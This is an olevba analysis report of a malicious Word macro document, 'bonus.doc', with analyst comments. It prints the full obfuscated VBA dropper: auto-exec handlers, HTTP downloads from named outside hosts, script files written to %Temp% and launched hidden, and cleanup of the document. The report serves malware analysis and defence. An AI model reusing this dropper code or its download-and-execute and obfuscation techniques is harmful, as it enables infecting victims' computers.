- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB- bonus.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: bonus.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: bonus.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Empty procedure. The "_Open" suffix mimics an event handler, but this name is not
- ' one Word/Excel calls automatically (olevba flags only AutoOpen/Auto_Open/Workbook_Open
- ' below), so it is most likely padding/decoy.
- Sub Dqwkdojqwiodqw_Open()
- End Sub
- ' Second empty decoy procedure; not referenced anywhere in the visible code.
- Sub Ejoqiwjdioqwjdqo_Open()
- End Sub
- ' Auto-exec entry point (runs on open in Excel; Word reaches it through AutoOpen below).
- ' Only job: hand off to Djiqowjdwoiqjdqwo, which in turn calls the dropper Xjqwidjowqjdq.
- Sub Auto_Open()
- Djiqowjdwoiqjdqwo
- End Sub
- ' Indirection layer between the auto-exec handlers and the real payload routine.
- ' UQHDIQWHD is junk (never read); the only effect is the call to Xjqwidjowqjdq.
- Sub Djiqowjdwoiqjdqwo()
- UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
- Xjqwidjowqjdq
- End Sub
- ' Dead code: assigns a junk string and is not called from anything visible here.
- Sub Giqjwdhqwkjq()
- DQUHWDIWQ = "eji21h ui21he21"
- End Sub
- ' Word auto-exec entry point (runs when the document is opened); delegates to Auto_Open.
- ' This is the trigger that matters for a .doc sample like bonus.doc.
- Sub AutoOpen()
- Auto_Open
- End Sub
- ' Excel workbook auto-exec entry point; NJQWBDJQKW is junk, then delegates to Auto_Open.
- ' Present so the same module fires whether it is hosted in a Word document or an Excel workbook.
- Sub Workbook_Open()
- NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
- Auto_Open
- End Sub
- ' Main dropper routine (reached via AutoOpen / Auto_Open / Workbook_Open -> Djiqowjdwoiqjdqwo).
- ' Analysis notes: nearly every string is assembled from Chr() and concatenation, and the
- ' arithmetic collapses to constants; the decoded values are noted inline. No Option Explicit is
- ' visible in this module, so undeclared names are Variants. A number of assignments (TROYA,
- ' IUQJWD, the first values of HUYFEA/BOSNIA/BAPTH, PSTB, JWIDJIAAA, ...) are junk never read.
- ' Observable behaviour, all from the Office process: two HTTP GETs via MSXML2.ServerXMLHTTP,
- ' a base64 decode via MSXML2.DOMDocument, .ps1/.vbs/.bat files written under %Temp%, the
- ' .bat launched hidden through Shell, then removal of marker text from the host document.
- Sub Xjqwidjowqjdq()
- Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
- Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
- ' Chr(92) = "\"
- BOLIVIA = Chr(90 + 2)
- ' Ubqhwdhwqbd returns CStr(Int(15425 * Rnd + 10000)): a random numeric base name for the dropped files
- ANGOLA = Ubqhwdhwqbd(15425) + ""
- ' "Temp"
- SPAIN = Chr(84) & "em" + "p"
- QHDQUWH = ANGOLA
- ' FL2 = the random base name (written as <n> in the notes below)
- FL2 = QHDQUWH
- ' Goabc wraps Environ(): PH2 = %Temp% & "\"
- PH2 = Module2.Goabc(SPAIN) + BOLIVIA
- silkroad = 9
- jwnqdw = -1
- BOSNIA = 12312312
- ' 1 + 1 + 113 + Sgn(-1) = 114
- BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
- BALAGAN = BOSNIA
- TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
- JWIDJIAAA = ""
- HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
- QIWJDABB = "b"
- ' "bat"
- HUYFEA = QIWJDABB + "a" + "t"
- IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
- ' Chr(115) & Chr(49) = "s1": PSFL = <n>.ps1
- PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
- ' Sin() takes radians, Sin(20) is about 0.913, so the argument is negative and gana = Sgn(...) = -1
- gana = NUqwdqwbdsad(1 - 300 * Sin(20))
- ' Chr(114 + 2 - 1) = Chr(115) = "s"
- SSS = Chr(BALAGAN + 2 + gana)
- ' Chr(46) = ".": VBFL = <n>.vbs
- VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
- ' Sgn(Fix(-22.043)) = -1, so Chr(-1 + 31 - 10 + 25 - 1 + 2) = Chr(46) = ".": BAFL = <n>.bat
- BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
- ' "object"
- INTG = "" & "o" & "bject"
- ' Chr(110 + Sgn(Len(BAFL))) = Chr(111) = "o", so "odule"
- KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
- ' "module"
- AFTG = Chr(109) & KIWD
- SXEE = Chr(46)
- SXAA = Chr(101)
- ' ".exe"
- SXE = SXEE & SXAA & "" & "xe"
- ' Chr(46) & "jpg" = ".jpg"
- GNG = Chr(2 ^ 2 + 42) + "jpg"
- ' Chr(47) = "/"
- HUQD = Chr(30 + 16 + 1)
- ' "http://"
- ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
- ' "savepic.su/" (host of the STAR1/STAR2 URLs built further down)
- BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
- ' Full drop paths: %Temp%\<n>.ps1, %Temp%\<n>.vbs, %Temp%\<n>.bat (BAPTH's first value is junk)
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
- ABPTH = PH2 + BAFL
- BAPTH = ABPTH
- JHQKWDQAASS = BQHJDQ
- ' File numbers 315..319 used by the Open ... For Output statements below
- Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
- DRT = 315
- BFT = 316
- CFT = 317
- DFT = 318
- EFT = 319
- Dim NUWDHUQHUQWDH As String
- ' "USERPROFILE"
- NUWDHUQHUQWDH = "USE" & "RPROFILE"
- Dim PBIn As String, asdwq As String, MIWDWQ As String
- ' ".txt"; CDDD = "78672738612836.txt"; LNSS = "papa.txt"
- TSTS = "." + "t" + "xt"
- CDDD = "78672738612836" + TSTS
- LNSS = "p" & "a" & "p" & "a" & "" + TSTS
- ' Two download locations (wp-content paths, so presumably compromised WordPress sites); STT2 is the fallback
- STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
- STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
- ' Stage 1: GET http://<STT1>78672738612836.txt (Linolium = MSXML2.ServerXMLHTTP GET, returns responseText)
- PBIn = ATTH + STT1 + CDDD
- CONT = Module2.Linolium(PBIn)
- ' Rasdas = Right(CONT, 1): only the last character of the response
- asdwq = Rasdas(CONT)
- HQUWDAAA = "0"
- ' If the body does not end in "=" (base64 padding, presumably used as a download sanity check),
- ' fetch the same file from the fallback host and remember that with HQUWDAAA = "1".
- ' NOTE: on the non-fallback path asdwq still holds just that one "=" character when it is
- ' decoded below, so the first host's body is effectively discarded; whether this is an
- ' author bug or intentional cannot be told from here.
- If (asdwq <> "=") Then
- PBIn = ATTH + STT2 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- ' Base64 decode through an MSXML2.DOMDocument element (Quqhwdbyas)
- CONT = Quqhwdbyas(asdwq)
- Dim ahuywdgqy As String
- ' Port() slices the text between <tag> and </tag>; the decoded payload is a template whose
- ' fragments (text10/20/21/30/31, stext1..3) are written verbatim into the dropped scripts below
- TVT10 = Port(CONT, "t" & "ext10")
- TVT20 = Port(CONT, "t" & "ext20")
- TVT21 = Port(CONT, "t" & "ext21")
- TVT30 = Port(CONT, "t" & "ext30")
- TVT31 = Port(CONT, "t" & "ext31")
- XPT1 = Port(CONT, "stext1")
- XPT2 = Port(CONT, "stext2")
- XPT3 = Port(CONT, "stext3")
- ' Environ("USERPROFILE"); hufehu1 <> 0 when the profile path contains "sers\" (a \Users\ profile)
- WVR = Module2.Goabc(NUWDHUQHUQWDH)
- hufehu1 = InStr(WVR, "sers\")
- Dim hudhw As Integer
- ' OS-branch selector: Join(ghdAdd) gives "2 0 0" or "1 3 0"; Val() strips blanks, so
- ' hudhw = 200 when \Users\ was found and 130 otherwise
- Dim ghdAdd(1 To 3)
- ghdAdd(1) = "1"
- ghdAdd(2) = "0"
- ghdAdd(3) = "0"
- If (hufehu1 <> 0) Then
- ghdAdd(1) = "2"
- Else
- ghdAdd(2) = "3"
- End If
- JHWQUD = Join(ghdAdd)
- hudhw = Val(JHWQUD)
- ' One-second busy wait (Module2.WaitFor)
- Module2.WaitFor (1)
- ' Stage 2: GET .../papa.txt from whichever host was used; the raw body (SEXX) is embedded into the dropped scripts
- MIWDWQ = ATTH + STT1 + LNSS
- If (HQUWDAAA = "1") Then
- MIWDWQ = ATTH + STT2 + LNSS
- End If
- SEXX = Module2.Linolium(MIWDWQ)
- ' PSTB is never used
- PSTB = PBIn + "123123123"
- ' http://savepic.su/5751812.jpg and http://savepic.su/5757956.jpg: handed to the dropped scripts as "statRT" / "$stat"
- MSTAR1 = JHQKWDQAASS + "5751812" + GNG
- MSTAR2 = JHQKWDQAASS + "5757956" + GNG
- STAR1 = ATTH + MSTAR1
- STAR2 = ATTH + MSTAR2
- ' "8" and "8.exe": the file name the dropped scripts are given for the next-stage binary under %Temp%
- FFQ = "8"
- FF = FFQ + SXE
- ' Branch for hudhw = 130 (no \Users\ in USERPROFILE): write %Temp%\<n>.bat and %Temp%\<n>.vbs, then run the .bat.
- ' Chr(34) is the double quote used to quote the values in the generated files.
- If (hudhw = 130) Then
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module2.WaitFor (1)
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- ' BDDT is never declared or assigned in the visible code; without Option Explicit it is an Empty
- ' Variant, so this member call should raise run-time error 424 (Object required) and abort the
- ' macro before HowEver runs on this branch. Looks like an author bug (probably meant Module2).
- BDDT.WaitFor (1)
- ' HowEver = Shell(BAPTH, 0): launches the .bat with a hidden window
- NTH1 = Module3.HowEver(retVal, BAPTH)
- End If
- ' "';" closes the single-quoted PowerShell string assignments written below
- HUDQG = "';"
- ' Branch for hudhw = 200 (\Users\ present): write %Temp%\<n>.ps1, <n>.vbs and <n>.bat, then run the .bat
- If (hudhw = 200) Then
- ZPQSKD = FL2
- Open PSPTH For Output As #CFT
- Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
- Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
- Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + HUDQG
- Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
- Print #DFT, TVT31
- Close #DFT
- Open BAPTH For Output As #EFT
- ' Chr(64) = "@": the batch file begins with "@echo off"
- Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, ":nqudiiqhdjkashd"
- Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
- Print #EFT, ":nqjdkbjkbdhjqwb"
- Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module2.WaitFor (1)
- ' Shell(BAPTH, 0): run the batch file hidden
- NTH2 = Module3.HowEver(retVal, BAPTH)
- End If
- ' Cleanup of the host document. AKK/JUW/ZKK = "<", "/", ">", so the calls target the
- ' "<object>...</object>" and "<module>...</module>" markers (India: c=1 deletes the text between
- ' the markers, c=2 colours it black, c=3 runs a document-wide replace; see Module3.India).
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
- NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- ' Thin wrapper around Sgn(): returns -1, 0 or 1. Used in Xjqwidjowqjdq to turn arithmetic
- ' into the constants that feed Chr(). Identical to Hhqudhqwgyuqwaaa below.
- Public Function NUqwdqwbdsad(a As Integer)
- NUqwdqwbdsad = Sgn(a)
- End Function
- ' Duplicate of NUqwdqwbdsad: Sgn() wrapper, used in Quqhwdbyas to derive the "M" of "MSXML2".
- Public Function Hhqudhqwgyuqwaaa(a As Integer)
- Hhqudhqwgyuqwaaa = Sgn(a)
- End Function
- ' Random number as a string: Int(a * Rnd + 10000), i.e. in [10000, 10000 + a). Supplies the
- ' base file name of the dropped scripts. No Randomize is visible, so the Rnd sequence is the
- ' VBA default unless seeded elsewhere.
- Public Function Ubqhwdhwqbd(a As Integer)
- Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
- End Function
- ' Base64 decoder built on MSXML: creates an MSXML2.DOMDocument element of DataType "bin.base64",
- ' assigns the encoded text and reads back nodeTypedValue. The objNodeS/E/Q/Z strings are junk.
- ' nodeTypedValue yields a Byte array; assigning it to the String return relies on VBA's
- ' byte-array-to-String conversion, so how the decoded bytes appear to the caller depends on the
- ' payload's encoding (not determinable from here).
- Public Function Quqhwdbyas(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
- ' Log10(100) = 2, Sgn(1 - 2) = -1, Chr(78 - 1) = "M": ProgID "MSXML2.DOMDocument"
- nudqwd = Log10(100)
- asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
- QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
- Set objXML = CreateObject(QHDHUQW)
- ' Element name "b64"
- Set objNode = objXML.createElement("b6" + "4")
- objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- ' "bin.base64"
- objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Quqhwdbyas = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- ' Extracts the text between "<b>" and "</b>" in a. UQWD/NDUW are Chr(60)/Chr(62) = "<" / ">".
- ' The "+ 8" hard-codes the opening tag length, which only fits the 6-character names used by
- ' the callers ("text10", "stext1", ...); if either marker is missing InStr returns 0 and the
- ' Mid$ arguments go wrong (a negative length raises run-time error 5). Note "krd" is declared
- ' without a type (Variant); only tent is an Integer.
- Public Function Port(a, b As String)
- Dim krd, tent As Integer
- UQWD = "" & Chr(58 + 2)
- NDUW = "" & Chr(70 - 8)
- ' Start of the inner text = position of "<b>" plus the tag's 8 characters
- krd = InStr(1, a, UQWD + b + NDUW) + 8
- ' Length = distance from there to "</b>"
- tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
- KLMN = Mid$(a, krd, tent)
- HUQHWDA = KLMN
- Port = HUQHWDA
- End Function
- ' Returns the last character of a. Used by Xjqwidjowqjdq to test whether a downloaded body
- ' ends in "=" before deciding to use the fallback host.
- Private Static Function Rasdas(a As String)
- Rasdas = Right(a, 1)
- End Function
- ' Base-10 logarithm via natural logs; SWOPJDQIOW is junk. Only called as Log10(100) (= 2)
- ' in Quqhwdbyas.
- Private Static Function Log10(x)
- SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
- Log10 = Log(x) / Log(10#)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: bonus.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Returns a.responseText, i.e. the HTTP response body of the ServerXMLHTTP object created in
- ' Module2.Linolium. Split into its own module presumably so no single module contains both the
- ' request and the response-read (olevba reports nothing suspicious for this module on its own).
- Public Function Xjdkhjfwefw(a As Object)
- Xjdkhjfwefw = (a.responseText)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: bonus.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Environ() wrapper: returns the value of environment variable sps. Called with "Temp" (drop
- ' directory) and "USERPROFILE" (OS-branch detection). The three QBY* strings are junk.
- Public Function Goabc(sps As String)
- QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- Goabc = Environ(sps)
- End Function
- ' Synchronous HTTP GET of URL nbqjbdjqw using MSXML2.ServerXMLHTTP; returns the response text
- ' (via Module1.Xjdkhjfwefw). There is no error handling, so a failed CreateObject, DNS failure
- ' or connection error raises a run-time error and aborts the calling macro. AHUDWQI is an
- ' empty String, so Send is called with an empty body.
- Public Function Linolium(nbqjbdjqw As String)
- Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
- Dim ashdUHhda As String, hausd As Integer
- ashdUHhda = nbqjbdjqw
- ' Sgn(0 - Abs(Cos(140))) = -1, so Chr(85 - 1) = "T": ProgID "MSXML2.ServerXMLHTTP"
- hausd = Sgn(0 - Abs(Cos(140)))
- BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
- 'MsgBox (BQDHJQWDGWQJGS)
- Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
- ' "GET"; the Open call omits the async flag, so the request is synchronous
- Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
- Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
- Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
- End Function
- ' Busy-wait for NumOfSeconds using Timer (seconds since midnight) while pumping DoEvents.
- ' Because Timer resets at midnight, a call that starts within NumOfSeconds of midnight never
- ' reaches SngSec and does not terminate as intended. Called with 1 between the network and
- ' file-write steps in ThisDocument.Xjqwidjowqjdq.
- Sub WaitFor(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Environ | May read system environment variables |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: bonus.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Post-drop cleanup of the host document (requires Word: uses ActiveDocument and Word's Find).
- ' dnuwhd = opening marker text (e.g. "<object>"), b = closing marker, c = mode:
- '   1 - delete the text between the two markers
- '   2 - set that text's font colour to black
- '   3 - document-wide Find/Replace of the search text with a space
- ' Called from ThisDocument.Xjqwidjowqjdq for the <object> and <module> markers, which suggests
- ' the encoded payload lives in the document body between those tags (hedged: the body is not
- ' visible here). The repeated HQUDGYGASDHJ / RHQHDQWUHDQKW assignments and commented lines are junk.
- ' The function never assigns India, so it returns Empty.
- Public Function India(dnuwhd As String, b As String, c As Integer)
- Dim selectedText As String
- Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
- ' Range over the whole document
- Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
- HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- With ssjidoqwhduqhwidqwudihq.Find
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- ' Find the opening marker and collapse the range to the point just after it
- .Text = dnuwhd
- .MatchWholeWord = True
- ssjidoqwhduqhwidqwudihq.Find.Execute
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
- Dim wdwq As String
- ' Second range starts where the opening marker ended ...
- Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
- Dim wdsadwq As String
- lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
- ' ... and, after locating the closing marker, ends where that marker begins, so it spans
- ' exactly the text between the two markers
- .Text = b
- .MatchWholeWord = True
- .Execute
- RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
- RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
- lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
- ' Mode 1: remove the enclosed text (Range.Delete's numeric result is stored but never used)
- If (c = 1) Then
- selectedText = lesleslesqjhdjqkwhdwq.Delete
- End If
- ' Mode 2: recolour the enclosed text black
- If (c = 2) Then
- lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
- End If
- Dim hduwaa As Integer
- ' 1 - 2^4 = -15, so Chr(33 + Sgn(-15)) = Chr(32) = " "
- hduwaa = 1 - 2 ^ 4
- QHUDW = Chr(33 + Sgn(hduwaa))
- ' Mode 3: replace every match with a space. NOTE: "a" is neither a parameter nor declared in this
- ' module (no Option Explicit is visible), so it is an Empty Variant and Find.Text becomes "",
- ' not the marker passed in dnuwhd. This looks like an author bug; the effect of a replace-all
- ' with an empty search text is not determinable from here.
- If (c = 3) Then
- With ssjidoqwhduqhwidqwudihq.Find
- .Text = a
- .Replacement.Text = QHUDW
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- ' Process launch: Shell(b, 0) runs command line b with window style 0 (vbHide, no visible
- ' window) and returns the task ID, stored into the ByRef Variant a and returned. Called with
- ' the dropped %Temp%\<n>.bat, so the observable event is the Office process spawning a batch
- ' file from %Temp%. VGQDVHQWD is junk.
- Public Function HowEver(a As Variant, b)
- VGQDVHQWD = "h2eh1 fg12e"
- a = Shell(b, 0)
- HowEver = a
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- +------------+---------+-----------------------------------------+